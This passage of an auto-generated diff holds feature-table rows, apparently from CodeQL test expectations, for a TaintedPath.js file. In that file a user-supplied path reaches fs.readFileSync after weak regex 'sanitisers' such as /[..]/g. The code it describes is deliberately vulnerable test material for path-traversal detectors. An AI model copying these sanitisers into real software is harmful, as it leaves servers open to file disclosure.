/\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:3:177:55 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:7:177:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:7:177:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:7:177:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:7:177:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:7:177:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6232,6 +64490,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:13:177:54 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:177:16:177:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:16:177:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:16:177:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:16:177:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:16:177:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | calleeImports | fs | @@ -6241,6 +64519,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:29:177:53 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:177:34:177:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:34:177:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:177:34:177:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:177:34:177:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:177:34:177:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:42:177:48 | /[..]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:177:42:177:48 | /[..]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:177:42:177:48 | /[..]/g | calleeImports | url | @@ -6259,6 +64542,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:177:51:177:52 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:177:51:177:52 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:177:51:177:52 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:3:178:53 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:7:178:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:7:178:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:7:178:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:178:7:178:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:178:7:178:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:178:13:178:14 | fs 